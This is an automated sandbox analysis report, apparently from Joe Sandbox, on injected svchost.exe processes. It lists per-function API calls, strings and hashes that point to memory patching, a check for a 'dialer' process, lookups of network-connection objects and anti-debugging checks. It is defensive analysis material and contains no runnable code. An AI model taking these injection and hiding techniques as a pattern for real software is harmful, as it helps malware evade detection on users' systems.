Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: dcdcd21decd63d49b16fc61ddde9d443f2d245f97ebf1a748cd23d93fb76e21f
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: 4B115E31A24B98DBE794DF6AA94825A73B0F39BB84F444029EB8A47B14EF38C151C741

Function 000002A3F06626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002A3F06627D4
StrCpyW.SHLWAPI ref: 000002A3F06627ED

Strings

\\.\pipe\, xrefs: 000002A3F06627DF

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 972fb7a53272f04296945cbcb6f95a558b2c5ae395cf098e943d3b2c0a283b1a
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 4271BB32B20B824BE7A4DE2E9D583AD6754F7A7788F440135ED498BF89EE35C7048741

Function 000002A3F06624DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002A3F06625C3
StrCpyW.SHLWAPI ref: 000002A3F06625DA

Strings

\\.\pipe\, xrefs: 000002A3F06625CE

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 93c15d5100a3b38bc46338c085f4d7940915c577cf792d61900a57c5f43e2f38
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: B151EA32B24B824BEBB4DA2DD95C36D5651F3A7784F000035ED86CBF95EE35C6018B42

Function 000002A3F0670604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002A3F067071B
GetLastError.KERNEL32 ref: 000002A3F067073D

Strings

U, xrefs: 000002A3F06706C7

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: d300fdcb149788ce7b24d1236b1f33b62c1e445d6bb6eb66158026e158c90d0e
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 4541B362B24A8086EB60CF29EC58399A7A0F3AA784F404035EE4DC7B44EF38C641CB51

Function 000002A3F066D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A3F066D6F9
LCMapStringW.KERNEL32 ref: 000002A3F066D781

Strings

LCMapStringEx, xrefs: 000002A3F066D6DC, 000002A3F066D6ED

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 7df1b5a457c453ee10fcc8731f5fbb6d5235cc434a78439a08691d8bae9f5b98
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: F5110E36B18B808AD7A0CB19F84429AB7A4F7DAB90F544136EECD87F59DF38C5508B01

Function 000002A3F06694A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002A3F06694E8
RaiseException.KERNEL32 ref: 000002A3F066952E

Strings

csm, xrefs: 000002A3F066951B

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 7d12fd0f5ed4de17f0a55b90b7ad43b4e29813162922e456b6fd588599dffb01
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: EE111F32614B8082EBA1CF19E94425D77E5F79AB98F184221EF8D4BB64EF38C655CB40

Function 000002A3F066D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A3F066D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002A3F066D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002A3F066D681

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 43f4ee235811d7a18f154299ddf3391ae06c7f4f3c2cb6aaaf9d884b16b827cd
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 0AF0B421F2079087E694DB49F9082582220EB9BB90F584031F95987F18EF38C794CB01

Function 000002A3F066D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A3F066D631
TlsSetValue.KERNEL32 ref: 000002A3F066D648

Strings

FlsSetValue, xrefs: 000002A3F066D61E

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 41cbc397a780ed6a8236a6da1296034201499d530e9ab6c6b9e0f38a03613191
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 10E06561F206409BEA94CB58FC0C6982261EB9B780F588132F5198AA55EF38CB55C702

Function 000002A3EFFCCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002A3EFFCCBC5

Strings

November, xrefs: 000002A3EFFCCBA8, 000002A3EFFCCBB2
October, xrefs: 000002A3EFFCCBBE

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: bccd00bc8ab946f2a7b3db10561d6faefaadadcbeac60e70ee9170717d64805b
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: CCE09222700591D3EF0ADB55F6483E422219F86744F5E9123B559862A6CEB8CA878347

Function 000002A3F0661D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A3F0661D9B
HeapAlloc.KERNEL32 ref: 000002A3F0661DAA
GetProcessHeap.KERNEL32 ref: 000002A3F0661E1E
HeapFree.KERNEL32 ref: 000002A3F0661E2C

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: bea6201ef47db569c32ae2d01dc7223a37915656bc2f8caf1476e1f29271613b
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: C5218822B14B908ADB51CF5DE90425AF3A0FB96B94F494120EE8D8BF24FE78C6468701

Function 000002A3F0661274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002A3F066127A
HeapAlloc.KERNEL32 ref: 000002A3F0661289
GetProcessHeap.KERNEL32 ref: 000002A3F06612A3
HeapAlloc.KERNEL32 ref: 000002A3F06612B4

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 1489f59ea2ff4b37f82ce32a23e64d08b0b790b90b84a247d5985319c3d73736
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: C0E03971B21610CBE744CB6ADC0834937E1EB9AB01F888024C90947750EF7D8599C741

Analysis Process: svchost.exePID: 372, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	83
Total number of Limit Nodes:	5

Executed Functions

Function 000002C9AFBB1274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002C9AFBB127A
HeapAlloc.KERNEL32 ref: 000002C9AFBB1289
GetProcessHeap.KERNEL32 ref: 000002C9AFBB12A3
HeapAlloc.KERNEL32 ref: 000002C9AFBB12B4

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 766397841229deff3997cb20636aa2421473b3c43feb979f59d95bd74ba3d030
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: EAE0C9726116008AF7049B66D81C75B76F1EB8DF51F898024CA4907390DF7E84DAC750

Function 000002C9AFBB3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002C9AFBB347A
PathFindFileNameW.SHLWAPI ref: 000002C9AFBB3489

Part of subcall function 000002C9AFBB3930: StrCmpNIW.SHLWAPI ref: 000002C9AFBB3948

Part of subcall function 000002C9AFBB3878: GetModuleHandleW.KERNEL32 ref: 000002C9AFBB3886
Part of subcall function 000002C9AFBB3878: GetCurrentProcess.KERNEL32 ref: 000002C9AFBB38B4
Part of subcall function 000002C9AFBB3878: VirtualProtectEx.KERNEL32 ref: 000002C9AFBB38D6
Part of subcall function 000002C9AFBB3878: GetCurrentProcess.KERNEL32 ref: 000002C9AFBB38F4
Part of subcall function 000002C9AFBB3878: VirtualProtectEx.KERNEL32 ref: 000002C9AFBB3915

CreateThread.KERNEL32 ref: 000002C9AFBB34D7

Part of subcall function 000002C9AFBB1EB4: GetCurrentThread.KERNEL32 ref: 000002C9AFBB1EBF

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 2e09a90fef0a02900b9e2d45880fe9ec0c3f089394a79b96f90f118b813c174c
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 0511697361061182FB25A721B84EFAF62B0FB98304F4C00399A0EC95E4EF7FC1C98250

Function 000002C9AFBBD130 Relevance: 3.1, APIs: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 000002C9AFBBD149
FreeEnvironmentStringsW.KERNEL32 ref: 000002C9AFBBD20D

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction ID: 116c1604d94c425c91a47476faa9b8083e13afd7474f70d43df7aa98e8733753
Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction Fuzzy Hash: 57217122B04B9085F6209F16A40C71EA6B4FB88BD0F484135DE9E67BD8DF3DC4928300

Function 000002C9AFBB1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002C9AFBB1650: GetProcessHeap.KERNEL32 ref: 000002C9AFBB165B
Part of subcall function 000002C9AFBB1650: HeapAlloc.KERNEL32 ref: 000002C9AFBB166A
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB16DA
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1707
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1721
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1741
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB175C
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB177C
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1797
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17B7
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB17D2
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB17F2

Sleep.KERNEL32 ref: 000002C9AFBB1C43
SleepEx.KERNELBASE ref: 000002C9AFBB1C49

Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB180D
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB182D
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1848
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB1868
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB1883
Part of subcall function 000002C9AFBB1650: RegOpenKeyExW.ADVAPI32 ref: 000002C9AFBB18A3
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB18BE
Part of subcall function 000002C9AFBB1650: RegCloseKey.ADVAPI32 ref: 000002C9AFBB18C8

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 44dab61989fdeb07f005ef60bc0a6f22da1cbd28f55a99c0858aa6a4822707b3
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 0031EE27300A0595FB50AF36DA6DB5E12B8AB44BC0F145431DE0D877F6EE66C8E18350

Function 000002C9AFBB3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002C9AFBB3948

Strings

dialer, xrefs: 000002C9AFBB3941

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: fe9029ee0210df7542c68caaeef988e2e22c2be57b4b50ee1bebc20be752b58b
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 30D0A76631130B86FF14DFA1C8DDB6D6374EB08704F8C8030CA0A46194D71A8DCEC710

Function 000002C9AFB82908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002C9AFB82A31

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: a1e8b7bae66d26cfd0a2895eb84072785b4596e41535b19ab73168f5483cc84a
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 79611F6770265187FF68CF29D44CB6CB3A1FBA4BA4F548021DA1D07785DB3AE892C740

Function 000002C9B029B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000002C9B029B8B5

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: fe87d2f0bc43995259f2fec5df68e5585e8ca395446ac2627f191c2c84c087e0
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 6CF04FD8302E85A0FF56EBA1B65DBAD42887F4CB48F086430890A462C1DE1CCCCDC190

Non-executed Functions

Function 000002C9B0292CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002C9B0292D80
lstrlenW.KERNEL32 ref: 000002C9B0292FBA

Part of subcall function 000002C9B0291A14: OpenProcess.KERNEL32 ref: 000002C9B0291A3A
Part of subcall function 000002C9B0291A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002C9B0291A58
Part of subcall function 000002C9B0291A14: PathFindFileNameW.SHLWAPI ref: 000002C9B0291A67
Part of subcall function 000002C9B0291A14: lstrlenW.KERNEL32 ref: 000002C9B0291A73
Part of subcall function 000002C9B0291A14: StrCpyW.SHLWAPI ref: 000002C9B0291A86
Part of subcall function 000002C9B0291A14: CloseHandle.KERNEL32 ref: 000002C9B0291A94

GetProcAddress.KERNEL32 ref: 000002C9B0292D95

Part of subcall function 000002C9B0291554: StrCmpIW.SHLWAPI ref: 000002C9B0291585

Part of subcall function 000002C9B0293930: StrCmpNIW.SHLWAPI ref: 000002C9B0293948

StrCmpNIW.SHLWAPI ref: 000002C9B0292DD8
lstrlenW.KERNEL32 ref: 000002C9B0292F00

Strings

\Device\Nsi, xrefs: 000002C9B0292DCB
ntdll.dll, xrefs: 000002C9B0292D79
NtQueryObject, xrefs: 000002C9B0292D8B

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 8daa5c17ed907ff135c4472e0134d8eb5c079b29f538e1a68526cbd000814573
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: C3B15CA2210ED4A1FB55DF25E44CBAD73A4F784B88F546026EE4953B94DE35CDC8C380

Function 000002C9AFBB2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002C9AFBB2D80
lstrlenW.KERNEL32 ref: 000002C9AFBB2FBA

Part of subcall function 000002C9AFBB1A14: OpenProcess.KERNEL32 ref: 000002C9AFBB1A3A
Part of subcall function 000002C9AFBB1A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002C9AFBB1A58
Part of subcall function 000002C9AFBB1A14: PathFindFileNameW.SHLWAPI ref: 000002C9AFBB1A67
Part of subcall function 000002C9AFBB1A14: lstrlenW.KERNEL32 ref: 000002C9AFBB1A73
Part of subcall function 000002C9AFBB1A14: StrCpyW.SHLWAPI ref: 000002C9AFBB1A86
Part of subcall function 000002C9AFBB1A14: CloseHandle.KERNEL32 ref: 000002C9AFBB1A94

GetProcAddress.KERNEL32 ref: 000002C9AFBB2D95

Part of subcall function 000002C9AFBB1554: StrCmpIW.SHLWAPI ref: 000002C9AFBB1585

Part of subcall function 000002C9AFBB3930: StrCmpNIW.SHLWAPI ref: 000002C9AFBB3948

StrCmpNIW.SHLWAPI ref: 000002C9AFBB2DD8
lstrlenW.KERNEL32 ref: 000002C9AFBB2F00

Strings

ntdll.dll, xrefs: 000002C9AFBB2D79
\Device\Nsi, xrefs: 000002C9AFBB2DCB
NtQueryObject, xrefs: 000002C9AFBB2D8B

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: cee1f624c99506b22f5a284cb5384617d4f19eae6fa38f3370feaf50b79cd7dc
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: C0B18E63210A9082FB669F25D45CBAEA3B4FB44B85F58502AEE4D53B94DF36CDC1C340

Function 000002C9B029B50C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002C9B029B585
RtlLookupFunctionEntry.NTDLL ref: 000002C9B029B59D
RtlVirtualUnwind.NTDLL ref: 000002C9B029B5D8
IsDebuggerPresent.KERNEL32 ref: 000002C9B029B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C9B029B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002C9B029B626

Strings

ec, xrefs: 000002C9B029B529

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: ec
API String ID: 1239891234-2323562846
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 6d1575f634b91f9ef913a1182f5a7881d3cb9ce6c09c0a87002a8eab4f8be338
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 33315F76204FC096EB60CF25E84C79E73A4F789758F541125EA9D43B99DF38C989CB80

Function 000002C9B029FEF8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002C9B029FF67
WriteFile.KERNEL32 ref: 000002C9B02A021E
WriteFile.KERNEL32 ref: 000002C9B02A0270
GetLastError.KERNEL32 ref: 000002C9B02A0372
GetLastError.KERNEL32 ref: 000002C9B02A03D2

Strings

ec, xrefs: 000002C9B029FF14

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID: ec
API String ID: 1443284424-2323562846
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 06e5a99c6ace4c596e7c110397052abb570d91e0ad481811551b3bfe074bb471
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: C1E1DEB2A04AC4AAF704CF64E48CADD7BB1F34578CF145116EE4A57B99DE34C89AC780

Function 000002C9B0297E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002C9B0297E8C
RtlCaptureContext.NTDLL ref: 000002C9B0297EB9
RtlLookupFunctionEntry.NTDLL ref: 000002C9B0297ED3
RtlVirtualUnwind.NTDLL ref: 000002C9B0297F14
IsDebuggerPresent.KERNEL32 ref: 000002C9B0297F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C9B0297F89
